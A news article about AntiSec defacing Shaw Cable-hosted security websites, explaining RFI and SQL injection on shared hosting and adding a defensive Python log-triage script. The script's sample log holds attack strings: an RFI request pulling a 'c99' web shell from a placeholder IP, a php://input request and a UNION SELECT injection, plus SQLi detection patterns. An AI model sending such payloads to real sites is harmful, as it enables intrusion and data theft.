On Wednesday, the AntiSec movement defaced hundreds of websites in what was said to be proof that the movement works just fine without Sabu, their alleged leader who was arrested and flipped by the FBI last year.
The sites that were defaced had something in common: they were security-related and were all hosted either directly by Shaw Cable or by its subsidiary Mountain Cablevision, both Canadian companies.
“Our Vessel sailed through their servers collecting all information they owned. These companies earn money exploiting the fear of the people and their feeling of daily life state sponsored insecurity,” an AntiSec statement explained.
“We are doing this not only to cause embarrassment and disruption to the security community but to show we are still alive and well... Law enforcement collaborators, and military contractors, private security companies beware: we're coming for your mail spools, barely legal porn, your sister’s pix and confidential documents.”
The attack targeted three different servers. One was a dedicated hosting account, while the other two were shared hosting servers. AntiSec named the security-related websites it was after, such as datasci.net, trojan-sis.com, e.password.com, and securitytrainingsupport.com, but hundreds of other domains sharing those servers were caught in the crossfire.
At the time this story was written, the majority of the attacked domains were either completely offline or reporting database connection errors. A full list of the domains present on the attacked servers can be seen here.
In the shared hosting environments, the most likely avenue of attack was Remote File Inclusion (RFI). A web application that passes attacker-controlled input to an include call can be made to fetch and execute a script from a remote host, typically a web shell, which gives the attacker full control of the targeted website under the web server's own account. If the server runs every hosted site under that same account, or does not confine each account to its own document root, every other domain on the server can be reached from that foothold.
Another possible entry point, based on viewing versions of the targeted websites before they were attacked, is SQL Injection (SQLi). In the past, this method of attack has allowed AntiSec supporters to wreak havoc on a domain and walk off with confidential and sensitive information. SQLi also enables mass attacks within a shared environment: the databases for all hosted sites are often stored on the same local database server, and if a site's database account has not been restricted to its own schema, a single injection point can reach other tenants' data as well.
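The two avenues described above leave distinct traces in a web server's access log, which is usually the first thing an affected host's owner can examine. The following Python triage script is an added example for this article; it is not code from AntiSec, Shaw Cable, or any of the defaced sites. It parses Apache combined-format log lines, flags query parameters that carry a remote URL or PHP stream wrapper (the RFI signature) or SQL keywords and comment terminators (the SQLi signature), and counts the offending source addresses. The sample log lines, IP addresses, file names, and detection patterns are all constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format access log lines (example data, not a real capture).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2012:10:01:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Mar/2012:10:01:15 +0000] "GET /index.php?page=http://198.51.100.7/c99.txt? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Mar/2012:10:01:20 +0000] "GET /news.php?id=17%27%20UNION%20SELECT%201,user(),3--%20 HTTP/1.1" 500 233 "-" "Mozilla/5.0"
203.0.113.12 - - [28/Mar/2012:10:02:02 +0000] "GET /search.php?q=shared+hosting HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Mar/2012:10:02:40 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A parameter value that begins with a URL scheme or PHP stream wrapper is the classic
# RFI payload: the application's include() fetches and executes whatever it points at.
RFI_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")

# Narrow SQLi indicators chosen to keep false positives low on ordinary search strings.
SQLI_RE = re.compile(
    r"(?i)(\bunion\b.{0,20}\bselect\b"                          # UNION ... SELECT
    r"|'\s*(or|and)\s+[\w']+\s*=\s*[\w']+"                      # ' OR 1=1, ' or 'a'='a
    r"|\b(sleep|benchmark|load_file|updatexml|extractvalue)\s*\("  # time-based / file read
    r"|--\s|/\*"                                                # comment terminators
    r"|\binformation_schema\b)"
)


def classify_value(value):
    """Return 'rfi', 'sqli' or None for one query-string value that parse_qsl already decoded once."""
    v = unquote_plus(value).strip()  # second decode catches double-encoded payloads such as %2568ttp
    if v.lower().startswith(RFI_SCHEMES):
        return "rfi"
    if SQLI_RE.search(v):
        return "sqli"
    return None


def scan_log(text):
    """Parse each combined-format line and return a list of findings for suspicious parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "param": name,
                    "kind": kind,
                    "value": unquote_plus(value),
                })
    return findings


def offenders(findings):
    """Count findings per source address so the noisiest client surfaces first."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["kind"].upper():4} {h["param"]}={h["value"]!r}')
    print("per-source:", dict(offenders(hits)))
```

On a shared host this should be run over every virtual host's log, not just the site that was defaced, because a web shell dropped through one tenant's include bug is the starting point for reaching the rest. The patterns are deliberately narrow; widen them only after checking what ordinary traffic to the application looks like, or the output becomes noise.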
SecurityWeek reached out and asked about the methods used during the attacks, given that the defacement message mentioned backdoors into the servers, but were turned away. The only comment for the record was “Also Cocks.” (For the unfamiliar, this term can be used several ways. One is lulz, or amusement. The other is a quick way to tell someone to go away. AntiSec doesn’t always like to give away their methods, and when they do it’s often within the defacement message itself.)
Earlier this month, after the FBI announced the arrest of Sabu and the fact that they had turned him in order to collect evidence against other LulzSec members and Anonymous supporters, one Special Agent close to the case mentioned that the arrest had cut the head off of the movement.
That same day, AntiSec targeted Panda Security, defacing a webserver that hosted several sub-domains used by the company. According to AntiSec's claims, Panda had helped put 25 people behind bars for their involvement in various operations championed by Anonymous, in addition to lurking in Anonymous' public IRC channels in an attempt to identify chat participants.
Panda's Technical Director, Luis Corrons, commented, "Even though we have not helped LE to bring to jail any LulzSec member, I would have loved to be involved in that." Panda recovered the webserver within hours, and no critical information was lost. The point AntiSec is making should be clear: the arrests have not removed the threat posed by the movement's supporters. Those who celebrated and assumed the threat had passed are in for a rude awakening if they let their guard down.
As always, organizations should check their critical web applications and protect the assets that are most valuable, which is often the information collected for day-to-day operations. Secure coding practices and security auditing, timely patching of the webserver and the software running on it, applying the principle of least privilege (including separate accounts and database credentials per hosted site), and disabling non-essential services are just some of the steps that will stop basic attacks like these from working.
Just remember, if an attacker is targeting your organization directly, there’s little you can do to stop them as they’re likely to get in eventually, which is why incident response is just as important as risk management.